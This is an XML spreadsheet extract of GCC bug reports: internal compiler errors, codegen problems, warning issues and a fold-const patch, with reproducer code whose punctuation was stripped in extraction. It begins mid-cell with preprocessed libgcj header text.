  java::lang::ClassLoader *getClassLoader (void)
    {
      return loader
    }
  java::lang::reflect::Constructor *getConstructor (JArray *)
  JArray *getConstructors (void)
  java::lang::reflect::Constructor *getDeclaredConstructor (JArray *)
  JArray *getDeclaredConstructors (void)
  java::lang::reflect::Field *getDeclaredField (jstring)
  JArray *getDeclaredFields (void)
  java::lang::reflect::Method *getDeclaredMethod (jstring JArray *)
  JArray *getDeclaredMethods (void)
  JArray *getDeclaredClasses (void)
  jclass getDeclaringClass (void)
  java::lang::reflect::Field *getField (jstring)
private:
  jint _getFields (JArray *result jint offset)
  JArray *_getConstructors (jboolean)
  java::lang::reflect::Field *getField (jstring jint)
  jint _getMethods (JArray *result
                    jint offset)
  java::lang::reflect::Field *getPrivateField (jstring)
  java::lang::reflect::Method *getPrivateMethod (jstring JArray *)
public:
  JArray *getFields (void)
  JArray *getInterfaces (void)
  void getSignature (java::lang::StringBuffer *buffer)
  static jstring getSignature (JArray * jboolean is_constructor)
  java::lang::reflect::Method *getMethod (jstring JArray *)
  JArray *getMethods (void)
  inline jint getModifiers (void)
    {
      return accflags
    }
  jstring getName (void)
  java::net::URL *getResource (jstring resourceName)
  java::io::InputStream *getResourceAsStream (jstring resourceName)
  JArray *getSigners (void)
  inline jclass getSuperclass (void)
    {
      return superclass
    }
  inline jboolean isArray (void)
    {
      return name-&gt;data[0] == '['
    }
  inline jclass getComponentType (void)
    {
      return isArray () ? (* (jclass *) 
    }
  jboolean isAssignableFrom (jclass cls)
  jboolean isInstance (jobject obj)
  inline jboolean isInterface (void)
  {
    return (accflags 
  }
  inline jboolean isPrimitive (void)
    {
      return vtable == ((_Jv_VTable *) -1)
    }
  jobject newInstance (void)
  jstring toString (void)
  jint size (void)
    {
      return size_in_bytes
    }
  void finalize ()
  Class (jobject cname jbyte sig jint len jobject array_vtable)
  {
    using namespace java::lang::reflect
    _Jv_Utf8Const *_Jv_makeUtf8Const (char *s int len)
    ((_Jv_Self *)this)-&gt;vtable_ptr -= 2 * sizeof (void *)
    name = _Jv_makeUtf8Const ((char *) cname -1)
    accflags = Modifier::PUBLIC | Modifier::FINAL | Modifier::ABSTRACT
    method_count = sig
    size_in_bytes = len
    vtable = ((_Jv_VTable *) -1)
    state = JV_STATE_DONE
    depth = -1
    if (method_count != 'V')
      _Jv_NewArrayClass (this __null (_Jv_VTable *) array_vtable)
  }
  static java::lang::Class class$
private:
  Class ()
  void checkMemberAccess (jint flags)
  void initializeClass (void)
  friend _Jv_Method *_Jv_GetMethodLocal (jclass klass _Jv_Utf8Const *name
                                         _Jv_Utf8Const *signature)
  friend jboolean _Jv_IsAssignableFrom(jclass jclass)
  friend jboolean _Jv_InterfaceAssignableFrom (jclass jclass)
  friend void *_Jv_LookupInterfaceMethodIdx (jclass klass jclass iface
                                             int method_idx)
  inline friend void
  _Jv_InitClass (jclass klass)
  {
    if (__builtin_expect (klass-&gt;state == JV_STATE_DONE true))
      return
    klass-&gt;initializeClass ()
  }
  friend _Jv_Method* _Jv_LookupDeclaredMethod (jclass _Jv_Utf8Const *
                                               _Jv_Utf8Const*)
  friend jfieldID JvGetFirstInstanceField (jclass)
  friend jint JvNumInstanceFields (jclass)
  friend jfieldID JvGetFirstStaticField (jclass)
  friend jint JvNumStaticFields (jclass)
  friend jobject _Jv_AllocObject (jclass jint)
  friend void *_Jv_AllocObj (jint jclass)
  friend void *_Jv_AllocArray (jint jclass)
  friend jobject _Jv_JNI_ToReflectedField (_Jv_JNIEnv * jclass jfieldID
                                           jboolean)
  friend jobject _Jv_JNI_ToReflectedMethod (_Jv_JNIEnv * jclass jmethodID
                                            jboolean)
  friend jfieldID _Jv_FromReflectedField (java::lang::reflect::Field *)
  friend jmethodID _Jv_FromReflectedMethod (java::lang::reflect::Method *)
  friend jmethodID _Jv_FromReflectedConstructor (java::lang::reflect::Constructor *)
  friend jint JvNumMethods (jclass)
  friend jmethodID JvGetFirstMethod (jclass)
  friend class java::lang::ClassLoader
  friend class java::io::ObjectOutputStream
  friend class java::io::ObjectInputStream
  friend class java::io::ObjectStreamClass
  friend void _Jv_WaitForState (jclass int)
  friend void _Jv_RegisterClasses (jclass *classes)
  friend void _Jv_RegisterInitiatingLoader (jclassjava::lang::ClassLoader*)
  friend void _Jv_UnregisterClass (jclass)
  friend jclass _Jv_FindClass (_Jv_Utf8Const *name
                               java::lang::ClassLoader *loader)
  friend jclass _Jv_FindClassInCache (_Jv_Utf8Const *name
                                      java::lang::ClassLoader *loader)
  friend void _Jv_NewArrayClass (jclass element
                                 java::lang::ClassLoader *loader
                                 _Jv_VTable *array_vtable = 0)
  friend jclass _Jv_NewClass (_Jv_Utf8Const *name jclass superclass
                              java::lang::ClassLoader *loader)
  friend void _Jv_PrepareCompiledClass (jclass)
  friend void _Jv_PrepareConstantTimeTables (jclass)
  friend jshort _Jv_GetInterfaces (jclass _Jv_ifaces *)
  friend void _Jv_GenerateITable (jclass _Jv_ifaces * jshort *)
  friend jstring _Jv_GetMethodString(jclass _Jv_Utf8Const *)
  friend jshort _Jv_AppendPartialITable (jclass jclass void ** jshort)
  friend jshort _Jv_FindIIndex (jclass * jshort * jshort)
  inline friend jclass
  _Jv_GetArrayClass (jclass klass java::lang::ClassLoader *loader)
  {
    if (__builtin_expect (!klass-&gt;arrayclass false))
      _Jv_NewArrayClass (klass loader)
    return klass-&gt;arrayclass
  }
# 344 /usr/local/include/java/lang/Class.h 3
  jclass next
  _Jv_Utf8Const *name
  _Jv_ushort accflags
  jclass superclass
  _Jv_Constants constants
  _Jv_Method *methods
  jshort method_count
  jshort vtable_method_count
  _Jv_Field *fields
  jint size_in_bytes
  jshort field_count
  jshort static_field_count
  _Jv_VTable *vtable
  jclass *interfaces
  java::lang::ClassLoader *loader
  jshort interface_count
  jbyte state
  java::lang::Thread *thread
  jshort depth
  jclass *ancestors
  _Jv_IDispatchTable *idt
  jclass arrayclass
}
# 18 /usr/local/include/gcj/cni.h 2 3
# 1 /usr/include/string.h 1 3
# 26 /usr/include/string.h 3
# 1 /usr/include/features.h 1 3
# 283 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 284 /usr/include/features.h 2 3
# 312 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 313 /usr/include/features.h 2 3
# 27 /usr/include/string.h 2 3
extern C {
# 1 /home/spin_test/awk/compilers/gcc-3.1-hol/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 1 3
# 34 /usr/include/string.h 2 3
extern void *memcpy (void *__restrict __dest
                     __const void *__restrict __src size_t __n) throw ()
extern void *memmove (void *__dest __const void *__src size_t __n)
     throw ()
extern void *memccpy (void *__restrict __dest __const void *__restrict __src
                      int __c size_t __n)
     throw ()
extern void *memset (void *__s int __c size_t __n) throw ()
extern int memcmp (__const void *__s1 __const void *__s2 size_t __n)
     throw () __attribute__ ((__pure__))
extern void *memchr (__const void *__s int __c size_t __n)
      throw () __attribute__ ((__pure__))
extern void *rawmemchr (__const void *__s int __c) throw () __attribute__ ((__pure__))
extern void *memrchr (__const void *__s int __c size_t __n)
      throw () __attribute__ ((__pure__))
extern char *strcpy (char *__restrict __dest __const char *__restrict __src)
     throw ()
extern char *strncpy (char *__restrict __dest
                      __const char *__restrict __src size_t __n) throw ()
extern char *strcat (char *__restrict __dest __const char *__restrict __src)
     throw ()
extern char *strncat (char *__restrict __dest __const char *__restrict __src
                      size_t __n) throw ()
extern int strcmp (__const char *__s1 __const char *__s2)
     throw () __attribute__ ((__pure__))
extern int strncmp (__const char *__s1 __const char *__s2 size_t __n)
     throw () __attribute__ ((__pure__))
extern int strcoll (__const char *__s1 __const char *__s2)
     throw () __attribute__ ((__pure__))
extern size_t strxfrm (char *__restrict __dest
                       __const char *__restrict __src size_t __n) throw ()
# 1 /usr/include/xlocale.h 1 3
# 28 /usr/include/xlocale.h 3
typedef struct __locale_struct
{
  struct locale_data *__locales[13]
  const unsigned short int *__ctype_b
  const int *__ctype_tolower
  const int *__ctype_toupper
} *__locale_t
# 109 /usr/include/string.h 2 3
extern int __strcoll_l (__const char *__s1 __const char *__s2 __locale_t __l)
     throw () __attribute__ ((__pure__))
extern size_t __strxfrm_l (char *__dest __const char *__src size_t __n
                           __locale_t __l) throw ()
extern char *strdup (__const char *__s) throw () __attribute__ ((__malloc__))
extern char *strndup (__const char *__string size_t __n)
     throw () __attribute__ ((__malloc__))
# 155 /usr/include/string.h 3
extern char *strchr (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern char *strrchr (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern char *strchrnul (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern size_t strcspn (__const</t>
  </si>
  <si>
    <t>inacio</t>
  </si>
  <si>
    <t>GCC-9164</t>
  </si>
  <si>
    <t>[Alpha] improper code generation</t>
  </si>
  <si>
    <t>There is a problem with the compiler on the Alpha platform when doing comparisons between variables of different types long and int.  This bug was discovered through mozilla's bug database and I am not sure if anyone from the GCC camp knows about it?
Release:
unknown
Environment:
DEC Alpha - linux 2.4
How-To-Repeat:
Compile the test program and see the two comparisons which should give the same result give different results but only on an Alpha platform.</t>
  </si>
  <si>
    <t>rf358197</t>
  </si>
  <si>
    <t>GCC-711</t>
  </si>
  <si>
    <t>-Wshadow gives spurious warning</t>
  </si>
  <si>
    <t>Compile this C++ program with `-W -Wall -Wshadow':
class foo
{
public:
  unsigned char     *bytes
  inline static int get1u (unsigned char* bytes)
  {
    return bytes[0]
  }
}
I get:
creche. gcc -W -Wall -Wshadow -fsyntax-only foo.cc
foo.cc: In static member function `int foo::get1u(unsigned char*)':
foo.cc:7: warning: declaration of `bytes' shadows previous local
I think this is wrong.  The name `bytes' as an argument
to get1u does not shadow the field because the method
is static.
This particular bug leads to many spurious warnings if
I enable -Wshadow for libgcj.
Release:
unknown
Environment:
current cvs gcc on x86 Red Hat Linux 6.2</t>
  </si>
  <si>
    <t>GCC-65823</t>
  </si>
  <si>
    <t>[6 Regression] ICE in gcc.c-torture/execute/stdarg-2.c -O0/-O1 for arm</t>
  </si>
  <si>
    <t>Comparing:
- https://gcc.gnu.org/ml/gcc-testresults/2015-04/msg02096.html (r222178) and
- https://gcc.gnu.org/ml/gcc-testresults/2015-04/msg02042.html (r222164)
shows two new stdarg-2.c failures for arm:
...
FAIL: gcc.c-torture/execute/stdarg-2.c   -O0  (internal compiler error)
FAIL: gcc.c-torture/execute/stdarg-2.c   -O0  (test for excess errors)
...
According to https://gcc.gnu.org/ml/gcc-patches/2015-04/msg01114.html :
...
/projects/.../src/gcc/gcc/testsuite/gcc.c-torture/execute/stdarg-2.c:
In function 'f3':
/projects/.../src/gcc/gcc/testsuite/gcc.c-torture/execute/stdarg-2.c:61:1:
error: incorrect sharing of tree nodes
aps[4]
# .MEM_5 = VDEF 
aps[4] = aps[4]
/projects/.../src/gcc/gcc/testsuite/gcc.c-torture/execute/stdarg-2.c:61:1:
internal compiler error: verify_gimple failed
0xae4893 verify_gimple_in_cfg(function* bool)
    /projects/.../src/gcc/gcc/tree-cfg.c:5136
0x9e3f2f execute_function_todo
    /projects/.../src/gcc/gcc/passes.c:1946
0x9e48d3 execute_todo
    /projects/.../src/gcc/gcc/passes.c:2003
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
...</t>
  </si>
  <si>
    <t>GCC-10158</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE with templates and friends</t>
  </si>
  <si>
    <t>The following code r.C extracted from boost's
libs/random/random_test.cpp cause an ice. gcc 3.2 accept this code
without a problem. I believe this is a regression. gcc 3.3 and 3.4
crash while trying to compile this code.
Release:
3.3 20030314 (prerelease)
Environment:
System: Linux linux 2.4.19-4GB #1 Wed Nov 27 00:56:40 UTC 2002 i686 unknown
Architecture: i686
SuSE 8.1
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc3/gcc/configure --enable-threads=posix
--enable-languages=cc++f77objc --enable-__cxa_atexit
How-To-Repeat:
source code r.C
namespace std
{
    template
    class allocator {}
    template
    struct char_traits
    template
	     typename _Alloc = allocator &gt;
    class basic_istringstream
    typedef basic_istringstream istringstream
    template
    class basic_string
    {
    public:
	basic_string(const _CharT* __s const _Alloc
    }
    template 
    class basic_streambuf {}
    template
    class basic_istream 
    {
    public:
	typedef basic_streambuf   __streambuf_type
	typedef basic_istream     __istream_type
	explicit 
	basic_istream(__streambuf_type* __sb)
	{ }
    }
    template
    class basic_istringstream : public basic_istream
    {
    public:
	typedef basic_string 	__string_type
    public:
	explicit
	basic_istringstream(const __string_type&amp; __str)
	    : __istream_type(0)
	    { }
    }
} // namespace std
template
class mersenne_twister
{
public:
    mersenne_twister() {}
    template
    friend std::basic_istream&amp;
    operator&gt;&gt;(std::basic_istream&amp; is mersenne_twister&amp; mt)
	{
	    mt.i = n
	    return is
	}
private:
    int i
}
typedef mersenne_twister mt11213b
template
void instantiate_urng(const URNG const ResultType &amp;)
{
    URNG urng
    std::istringstream input(hurz)
    input &gt;&gt; urng
}
int main(int char*[])
{
    instantiate_urng(mt11213b() 0u)
}
gcc 3.3
g++ -v -W -Wall --save-temps r.C 
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ../gcc3/gcc/configure --enable-threads=posix --enable-languages=cc++f77objc --enable-__cxa_atexit
Thread model: posix
gcc version 3.3 20030314 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/cc1plus -E -D__GNUG__=3 -quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D_GNU_SOURCE r.C -W -Wall r.ii
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/c++/3.3
 /usr/local/include/c++/3.3/i686-pc-linux-gnu
 /usr/local/include/c++/3.3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.3/cc1plus -fpreprocessed r.ii -quiet -dumpbase r.C -auxbase r -W -Wall -version -o r.s
GNU C++ version 3.3 20030314 (prerelease) (i686-pc-linux-gnu)
	compiled by GNU C version 3.3 20030314 (prerelease).
GGC heuristics: --param ggc-min-expand=47 --param ggc-min-heapsize=31901
r.C: In function `std::basic_istream&amp; 
   operator&gt;&gt;(std::basic_istream&amp; mersenne_twister&lt;UIntType 
   n&gt;&amp;) [with CharT = char Traits = std::char_traits UIntType = 
   unsigned int int n = 351]':
r.C:76:   instantiated from `void instantiate_urng(URNG const ResultType&amp;) [with URNG = mersenne_twister ResultType = unsigned int]'
r.C:81:   instantiated from here
r.C:62: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc 3.2
/usr/bin/g++ -v -W -Wall --save-temps r.C 
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/3.2/specs
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib --enable-languages=cc++f77objcjavaada --enable-libgcj --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib --with-system-zlib --enable-shared --enable-__cxa_atexit i486-suse-linux
Thread model: posix
gcc version 3.2
 /usr/lib/gcc-lib/i486-suse-linux/3.2/cpp0 -lang-c++ -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i486__ r.C -W -Wall r.ii
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/include/g++
 /usr/include/g++/i486-suse-linux
 /usr/include/g++/backward
 /usr/local/include
 /usr/lib/gcc-lib/i486-suse-linux/3.2/include
 /usr/i486-suse-linux/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i486-suse-linux/3.2/cc1plus -fpreprocessed r.ii -quiet -dumpbase r.C -W -Wall -version -o r.s
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2 (i486-suse-linux)
	compiled by GNU C version 3.2.
r.C: In member function `std::basic_istream&lt;_CharT 
   _Traits&gt;::basic_istream(std::basic_streambuf*) [with _CharT 
   = char _Traits = std::char_traits]':
r.C:34:   instantiated from `std::basic_istream::basic_istream(std::basic_streambuf*) [with _CharT = char _Traits = std::char_traits]'
r.C:47:   instantiated from `std::basic_istringstream::basic_istringstream(const std::basic_string&amp;) [with _CharT = char _Traits = std::char_traits _Alloc = std::allocator]'
r.C:75:   instantiated from `void instantiate_urng(URNG const ResultType&amp;) [with URNG = mersenne_twister ResultType = unsigned int]'
r.C:81:   instantiated from here
r.C:34: warning: unused parameter `std::basic_streambuf&lt;char 
   std::char_traits &gt;*__sb'
 /usr/lib/gcc-lib/i486-suse-linux/3.2/../../../../i486-suse-linux/bin/as -V -Qy -o r.o r.s
GNU assembler version 2.12.90.0.15 (i486-suse-linux) using BFD version 2.12.90.0.15 20020717 (SuSE)
 /usr/lib/gcc-lib/i486-suse-linux/3.2/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/gcc-lib/i486-suse-linux/3.2/../../../crt1.o /usr/lib/gcc-lib/i486-suse-linux/3.2/../../../crti.o /usr/lib/gcc-lib/i486-suse-linux/3.2/crtbegin.o -L/usr/lib/gcc-lib/i486-suse-linux/3.2 -L/usr/lib/gcc-lib/i486-suse-linux/3.2/../../../../i486-suse-linux/lib -L/usr/lib/gcc-lib/i486-suse-linux/3.2/../../.. r.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc-lib/i486-suse-linux/3.2/crtend.o /usr/lib/gcc-lib/i486-suse-linux/3.2/../../../crtn.o</t>
  </si>
  <si>
    <t>poschmid</t>
  </si>
  <si>
    <t>GCC-78442</t>
  </si>
  <si>
    <t>[variant] std::get(Variant) is not constexpr.</t>
  </si>
  <si>
    <t>See the below reproducer:
#include 
constexpr bool test() {
  std::variant v(42)
  auto const
  static_assert(std::get(v) == 42 )
  static_assert(std::get(cv) == 42 )
  return true
}
static_assert(test() )
int main() {}</t>
  </si>
  <si>
    <t>GCC-16302</t>
  </si>
  <si>
    <t>gcc fails to warn about some common logic errors</t>
  </si>
  <si>
    <t>A gcc -Wextra -O misses the 4 bugs in this test program:
int
main (int argc char *argv[])
{
   if (argc != 1 || argc != 2) return 1
   if (argc &lt; 0 
   if (argc || !argc) return 1
   if (argc 
   return 0
}
With a tweak to fold-const.c (below) they will be caught:
t.c:4: warning: `or' of collectively exhaustive tests is always 1
t.c:5: warning: `and' of mutually exclusive tests is always 0
t.c:6: warning: `or' of collectively exhaustive tests is always 1
t.c:7: warning: `and' of mutually exclusive tests is always 0
A bootstrap of gcc-3.5-20040627 reports such a warning in fold-const.c itself
the patch below includes the obvious fix.
====
Comment: The -O is needed due to this code in fold-const.c:
      /* We only do these simplifications if we are optimizing.  */
      if (!optimize)
        return t
This is probably from when fold-const.c was much simpler
but I think is no longer appropriate and recommend it be deleted.
====
*** fold-const.c.orig   Sun Jun 27 11:23:44 2004
--- fold-const.c        Wed Jun 30 12:43:39 2004
***************
*** 43774379 ****
                                         in_p low high))))
!     return or_op ? invert_truthvalue (tem) : tem
--- 43774388 ----
                                         in_p low high))))
!     {
!       if (TREE_CODE (tem) == INTEGER_CST &amp;&amp; extra_warnings)
!         {
!           if (or_op)
!             warning (`or' of collectively exhaustive tests is always 1)
!           else
!             warning (`and' of mutually exclusive tests is always 0)
!         }
!       return or_op ? invert_truthvalue (tem) : tem
!     }
***************
*** 999810000 ****
          || (TREE_CODE (op0) == REAL_CST
!             &amp;&amp; TREE_CODE (op0) != REAL_CST))
        {
--- 1000710009 ----
          || (TREE_CODE (op0) == REAL_CST
!             &amp;&amp; TREE_CODE (op1) != REAL_CST))
        {</t>
  </si>
  <si>
    <t>GCC-19226</t>
  </si>
  <si>
    <t>ICE in g++.old-deja/g++.pt/asm1.C and asm2.C with -fpic/-fPIC</t>
  </si>
  <si>
    <t>When running the GCC testsuite on i686-pc-linux-gnu using -fpic or -fPIC I get 
additional failures with 3.3 3.4 and mainline:
FAIL: g++.old-deja/g++.pt/asm1.C (test for excess errors)
FAIL: g++.old-deja/g++.pt/asm2.C (test for excess errors)
as shown here:
http://gcc.gnu.org/ml/gcc-testresults/2005-01/msg00029.html
http://gcc.gnu.org/ml/gcc-testresults/2005-01/msg00085.html
http://gcc.gnu.org/ml/gcc-testresults/2005-01/msg00084.html
Both of these tests fail like this:
g++.old-deja/g++.pt/asm1.C:6: error: can't find a register in class `BREG' 
while reloading `asm'
Is there something to fix in the compiler the testcase or should the test be 
bypassed when using -fpic/-fPIC ?</t>
  </si>
  <si>
    <t>GCC-20245</t>
  </si>
  <si>
    <t>[4.1 regression] ICE on invalid function declaration</t>
  </si>
  <si>
    <t>Mainline now segfaults when compiling the following invalid code snipptet:
===============
void foo() x
===============
bug.c: In function 'foo':
bug.c:1: error: expected declaration specifiers before 'x'
bug.c:1: error: expected '{' at end of input
bug.c:1: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Joseph this is probably fallout from the new C parser.
Could you please have a look?</t>
  </si>
  <si>
    <t>GCC-62044</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE in USE statement with RENAME for extended derived type</t>
  </si>
  <si>
    <t>Hello
I am getting an internal compiler error with the following code when using RENAME list of USE statement with extended derived type. The following reduced source code reproduce the issue:
$ cat GridImageSilo_Template.f90 
module GridImageSilo_Template
  implicit none
  private
  type public abstract :: GridImageSiloTemplate
  end type GridImageSiloTemplate
end module GridImageSilo_Template
$ cat UnstructuredGridImageSilo_Form.f90 
module UnstructuredGridImageSilo_Form
  use GridImageSilo_Template
  implicit none
  private
  type public extends ( GridImageSiloTemplate ) :: &amp;
    UnstructuredGridImageSiloForm
  end type UnstructuredGridImageSiloForm
end module UnstructuredGridImageSilo_Form
$ cat UnstructuredGridImages.f90 
module UnstructuredGridImages
  use UnstructuredGridImageSilo_Form &amp;
        UnstructuredGridImageForm =&gt; UnstructuredGridImageSiloForm
end module UnstructuredGridImages
$ cat FileSystem.f90 
module FileSystem
  use UnstructuredGridImages
end module FileSystem
And if I compile them in order:
$ gfortran -c GridImageSilo_Template.f90
$ gfortran -c UnstructuredGridImageSilo_Form.f90 
$ gfortran -c UnstructuredGridImages.f90 
$ gfortran -c FileSystem.f90 
f951: internal compiler error: Segmentation fault
0xa3184f crash_signal
        ../../gcc_trunk/gcc/toplev.c:337
0x5a5cf8 load_derived_extensions
        ../../gcc_trunk/gcc/fortran/module.c:4578
0x5a5cf8 read_module
        ../../gcc_trunk/gcc/fortran/module.c:5229
0x5a5cf8 gfc_use_module
        ../../gcc_trunk/gcc/fortran/module.c:6868
0x5a7586 gfc_use_modules()
        ../../gcc_trunk/gcc/fortran/module.c:6992
0x5af9c7 use_modules
        ../../gcc_trunk/gcc/fortran/parse.c:114
0x5b1f24 decode_statement
        ../../gcc_trunk/gcc/fortran/parse.c:329
0x5b31f9 next_free
        ../../gcc_trunk/gcc/fortran/parse.c:926
0x5b31f9 next_statement
        ../../gcc_trunk/gcc/fortran/parse.c:1121
0x5b3bbb parse_spec
        ../../gcc_trunk/gcc/fortran/parse.c:3065
0x5b6bb3 parse_module
        ../../gcc_trunk/gcc/fortran/parse.c:4757
0x5b6bb3 gfc_parse_file()
        ../../gcc_trunk/gcc/fortran/parse.c:5063
0x5f57d5 gfc_be_parse_file
        ../../gcc_trunk/gcc/fortran/f95-lang.c:212
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Here's gfortran version that I have:
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gcc/4.10/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc_trunk/configure --prefix=/usr/local/gcc/4.10 --enable-languages=cfortranc++ --disable-multilib
Thread model: posix
gcc version 4.10.0 20140709 (experimental) (GCC) 
Thanks for looking into this.</t>
  </si>
  <si>
    <t>reubendb</t>
  </si>
  <si>
    <t>GCC-26071</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE declaring destructor virtual and static</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE:
===============================
struct A
{
  virtual static ~A()
}
===============================
  '
  Segmentation fault
  Please submit a full bug report [etc.]
This a regression from GCC 3.4.x. Before we got the error message:
  bug.cc:3: error: member `A' cannot be declared both virtual and static
which is not quite correct but tolerable.
Will post patch soon.</t>
  </si>
  <si>
    <t>GCC-47192</t>
  </si>
  <si>
    <t>m68k target - gcc uses stack frame after it has been unlinked when compiling with -Os</t>
  </si>
  <si>
    <t>Created attachment 22913
Testcase - Preprocessor output
Attached test case produces code which ends with 
  61 003c 41EE FFFE 		lea (-2%fp)%a0
  30:gcc-bug.c     ****   return d
  31:gcc-bug.c     **** }
  62               		.loc 1 32 0
  63 0040 242E FFF8 		move.l -8(%fp)%d2
  64 0044 4E5E      		unlk %fp
  30:gcc-bug.c     ****   return d
  65               		.loc 1 30 0
  66 0046 33D0 0000 		move.w (%a0)stc.1197
  66      0000 
  67               		.loc 1 32 0
  68 004c 4E75      		rts
If an interrupt occurs between the unlk and move.w the variable pointed to by (a0) is corrupted prior to being copied.
Compiling with -O1 keeps the lea and move.w together before the unlk which is correct.
Compiling with -O2 results in a move.w d1stc.1197 after the unlk (contents of variable already in d1) so gets away with it.
gcc output below and .i file attached.
Problem also present in 4.5.1.
m68k-elf-gcc -v -save-temps -c -g -gdwarf-2 -ffunction-sections -fdata-sections -Os -mcpu=51qe -Wall -Wa-ahlms=gcc-bug.ls -I. -I/usr/local/gcc-m68k/m68k-elf/include gcc-bug.c
Using built-in specs.
COLLECT_GCC=m68k-elf-gcc
COLLECT_LTO_WRAPPER=/usr/local/gcc-m68k-4.5.2/libexec/gcc/m68k-elf/4.5.2/lto-wrapper
Target: m68k-elf
Configured with: ../configure --target=m68k-elf --prefix=/usr/local/gcc-m68k-4.5.2 --enable-languages=c --with-newlib --disable-libssp --with-gnu-as --with-gnu-ld
Thread model: single
gcc version 4.5.2 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-g' '-gdwarf-2' '-ffunction-sections' '-fdata-sections' '-Os' '-mcpu=51qe' '-Wall' '-I.' '-I/usr/local/gcc-m68k/m68k-elf/include'
 /usr/local/gcc-m68k-4.5.2/libexec/gcc/m68k-elf/4.5.2/cc1 -E -quiet -v -I. -I/usr/local/gcc-m68k/m68k-elf/include -imultilib m51qe gcc-bug.c -mcpu=51qe -Wall -ffunction-sections -fdata-sections -g -gdwarf-2 -fworking-directory -Os -fpch-preprocess -o gcc-bug.i
ignoring nonexistent directory /usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/../../../../m68k-elf/sys-include
#include ... search starts here:
#include  search starts here:
 .
 /usr/local/gcc-m68k/m68k-elf/include
 /usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/include
 /usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/include-fixed
 /usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/../../../../m68k-elf/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-g' '-gdwarf-2' '-ffunction-sections' '-fdata-sections' '-Os' '-mcpu=51qe' '-Wall' '-I.' '-I/usr/local/gcc-m68k/m68k-elf/include'
 /usr/local/gcc-m68k-4.5.2/libexec/gcc/m68k-elf/4.5.2/cc1 -fpreprocessed gcc-bug.i -quiet -dumpbase gcc-bug.c -mcpu=51qe -auxbase gcc-bug -g -gdwarf-2 -Os -Wall -version -ffunction-sections -fdata-sections -o gcc-bug.s
GNU C (GCC) version 4.5.2 (m68k-elf)
	compiled by GNU C version 4.3.2 GMP version 4.2.2 MPFR version 2.3.1 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64520
GNU C (GCC) version 4.5.2 (m68k-elf)
	compiled by GNU C version 4.3.2 GMP version 4.2.2 MPFR version 2.3.1 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64520
Compiler executable checksum: 2edb184913810d520b23104a9f78d5ce
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-g' '-gdwarf-2' '-ffunction-sections' '-fdata-sections' '-Os' '-mcpu=51qe' '-Wall' '-I.' '-I/usr/local/gcc-m68k/m68k-elf/include'
 /usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/../../../../m68k-elf/bin/as -v -I. -I/usr/local/gcc-m68k/m68k-elf/include -mcpu=51qe -ahlms=gcc-bug.ls -o gcc-bug.o gcc-bug.s
GNU assembler version 2.20 (m68k-elf) using BFD version (GNU Binutils) 2.20
